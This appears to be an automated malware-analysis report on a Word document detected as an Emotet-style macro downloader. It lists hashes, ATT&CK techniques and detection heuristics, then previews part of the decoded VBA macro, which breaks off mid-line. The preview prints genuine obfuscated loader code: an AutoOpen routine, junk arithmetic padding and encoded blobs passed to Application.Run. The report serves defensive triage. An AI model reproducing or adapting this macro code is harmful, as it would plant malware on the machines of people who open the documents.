Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a24595725943614c…

MALICIOUS

Office (OLE)

165.5 KB Created: 2018-04-11 08:52:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: 72c620bdf6945259a31382ef486f4a40 SHA-1: 6bec53e883dd79e05333fb7bdcd042e6b59fd1c3 SHA-256: a24595725943614cdb52f5703378d68828dd15cc42a46c70514e63ea921e669d
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro attempts to execute a second-stage payload by calling Application.Run with a dynamically constructed string, likely downloading and running further malicious content. The ClamAV detection and heuristic firings strongly indicate malicious intent.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 145242 bytes
SHA-256: 6a7512a99a913ea9fd734cf998ff3d168a3ae2f815226439690d8f342714fde8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 46 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "zSCwnFfK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
dmGOs = CByte(vtQhZ)
otYWT = FPLsf
oqjRU = Cos(26532 - Oct(25179 + kdUBz * Scquf - CBool(zbwPNK)))
Application.Run aXTNl + "FCsdtDpiBrtboj" + saCqd, CUDZL + tVZimvCb + XXCBd
QMpQM = CByte(REKtmw)
QjuGq = lMVcV
CnqqmS = Cos(47253 - Oct(88816 + zYRbNK * ZOJiE - CBool(vpdRL)))
End Sub

Attribute VB_Name = "rMukUXKEaNXa"
Sub EWSLc(cGMmGT)
pusBMV = CByte(mChCo)
EDFwLr = UAkcdA
iffZoR = Cos(63193 - Oct(64863 + MZBBT * CpQXja - CBool(ANbOk)))
End Sub
Function tVZimvCb()
On Error Resume Next
CwvjTJ = CByte(pfGQQ)
dnIYt = lDKOL
vzBZnb = Cos(38210 - Oct(53010 + UwprR * iUPDDY - CBool(kKiHI)))
mIzMjl = UjcSm("nQjDj1EANAA1ADYAMgBiADMAMAA5ADMAOQBlADkAZAAzADQANwBjADUAOABkzvt", 7 + YMSfR - YMSfR, 54 + YMSfR - YMSfR)
TXrikp = CByte(MEPsf)
oMJoTh = cDjuLH
tNqrf = Cos(36447 - Oct(76818 + jcQEC * adEXXG - CBool(obWPaj)))
LcEjvr = CByte(bKnkB)
EKABqO = iEkZN
tUMzj = Cos(51868 - Oct(60895 + PGXzd * XVwmn - CBool(DwTmuc)))
wsKrzOmiJ = UjcSm("da,kADMAMQBiADIAMQA0ADEAYgAzADAAZABmADkAYgAyAGQAMAA2ADAAMwBlAGMAYwA2ADMANQA0ADEAMgBlADIANgA2ADAAYwA1AGQAZQAyADIANQAwADYANwBjADMAZAAzADDo", 6 + QnzWc - QnzWc, 129 + QnzWc - QnzWc)
oQGri = CByte(ZwBOL)
JVZpD = DMtwNI
lYSwBa = Cos(8867 - Oct(8929 + rtIPs * DXWGlf - CBool(SdHPJq)))
SsNLr = CByte(hCnwiu)
nfIJt = PqKIFH
QwvHFk = Cos(73768 - Oct(30426 + ZzCht * spsnZV - CBool(fswwF)))
dCwfb = UjcSm("ohwBmADkAOQA5AGIANwAzADgAMgBhAGYAYQBmADMAZAAyAGEAZgA4AGMAOQBiAGMAMwBlADQANQA0ADgAMABiAGUAMwA2AGEAMABmADQAYwBmADYANABhADAAZQBYp%YpUb", 3 + RpCwt - RpCwt, 122 + RpCwt - RpCwt)
iHjHD = CByte(ilHfq)
HzOGIG = sjwVQ
iTGQC = Cos(22165 - Oct(18771 + NlRpsw * KukJBo - CBool(WvZkp)))
iVuJu = CByte(NiwoYn)
nDTra = RwtrO
AziOG = Cos(8258 - Oct(28194 + ljFIBI * DunKiO - CBool(VPZVCi)))
mMpjp = UjcSm("o. myAGMANwA1ADQANwAwADIAMQBhADcAZABlAGYAZAA1AGYANgAyAGIAMwBkADQAYgBlAGIANwA2ADkAYQBlADUAZABjADAANAA3AGUAOABmADMAZgAwAGIAYwA5ADkAOAA4ADgANQAxADUAYQAzADcANwBiAGEANABhADQAjJ", 5 + MpjmSp - MpjmSp, 165 + MpjmSp - MpjmSp)
Spijsu = CByte(jUsjJJ)
EwLqSJ = BFhjD
iPolB = Cos(69083 - Oct(92539 + tacJO * UavaY - CBool(NRQOi)))
JFsFF = CByte(KktzMl)
kdRCfp = bnGjHz
jzVjK = Cos(7726 - Oct(55195 + kMsPLp * RlCOIW - CBool(QzNpfm)))
jBpwM = UjcSm("3rkANQAyAGMANgA0ADYAZAA3AGUAMwBmAGQAYgAyAGMANwBkADQAMAA2ADgANQBhAGUAMABlADAANQA1ADkAMAA3ADIAMQAzADgAYgBiADgAMAAxADEAZAAzAGIANQBjAGQAMAAwAGIAYgA0ADMANAA5AGQAO2qJU8", 3 + VUQjzA - VUQjzA, 154 + VUQjzA - VUQjzA)
zLzIT = CByte(lXQChJ)
sEJPd = uVVit
DAiXVU = Cos(46770 - Oct(80597 + lAuHr * vtUAh - CBool(VqMozL)))
nJCaO = CByte(iizEn)
OwJtXN = BuIJDj
BUPvn = Cos(81167 - Oct(5082 + FUfpRF * pQQpVW - CBool(LRasE)))
CXMINBbh = UjcSm("L1ErGEAOABhADIAOAAzADgAZQA2AGYAMwBjADUAYwBkADUANgA3ADQANAAxAGQAMgA2AGQANQA4ADcAOAAxADAAOQAxADgANABhAGQANAAzAGYAZgA4AGUAZAAwADQAYwAwADgAMABjADAAMAA2ADcAZABmADMAMgA1ADQAMgA0AGQAMgA5ADQAOQA5AGYAYQA4tj", 5 + sAihET - sAihET, 191 + sAihET - sAihET)
Rizwr = CByte(JNTERz)
WtpNhv = LEssO
wbJwU = Cos(89139 - Oct(71837 + bbUhwX * cWLzru - CBool(jWDsw)))
XtjlXR = CByte(wlllz)
LhdIaU = YNYmu
vitTww = Cos(91935 - Oct(41787 + CFfCpB * zvqHw - CBool(NjCGk)))
pqRsjnhF = UjcSm("AjhADUAYgA0ADgANwAyADUAZAA4ADAAZgA3ADIAZQBjADUAZQA0AGEAZAA5AGEAZAAzADcAMwBhAGYAMQBmAGEAZQBmADkAYQAxADkAYQA0AGQAZgA5ADEAOQBjADEANQBlAGEAMAA2ADQAOAA2AGUAZQBhADkANgA4AGMAO%bSq4", 3 + NMlHjd - NMlHjd, 166 + NMlHjd - NMlHjd)
SJUuq = CByte(WuERom)
PYiXd = iBPQd
nstQKR = Cos(80272 - Oct(26807 + DdiKoT * GEfGE - CBool(hiiLY)))
OLEqf = CByte(AJdLwH)
VDRzch = ZQOZH
jzfCb = Cos(3592 - Oct(82934 + GzOpj * uzOFGF - CBool(jzmdrk)))
BsQpVXRtmbw = UjcSm("QFYwBjADQANwA2AGMANgBmAGEAYgA0ADAAYgBlADcAYQBjADIAOQBlAGQAZQBhADYAMwBkAGUAZgAyADUAN2S8j", 3 + GODtrz - GODtrz, 81 + GODtrz - GODtrz)
iwwfiF = CByte(Cdakw)
WPGDI = iTcCJT
pwztZ = Cos(70220 - Oct(34193 + aIAjG * 
... (truncated)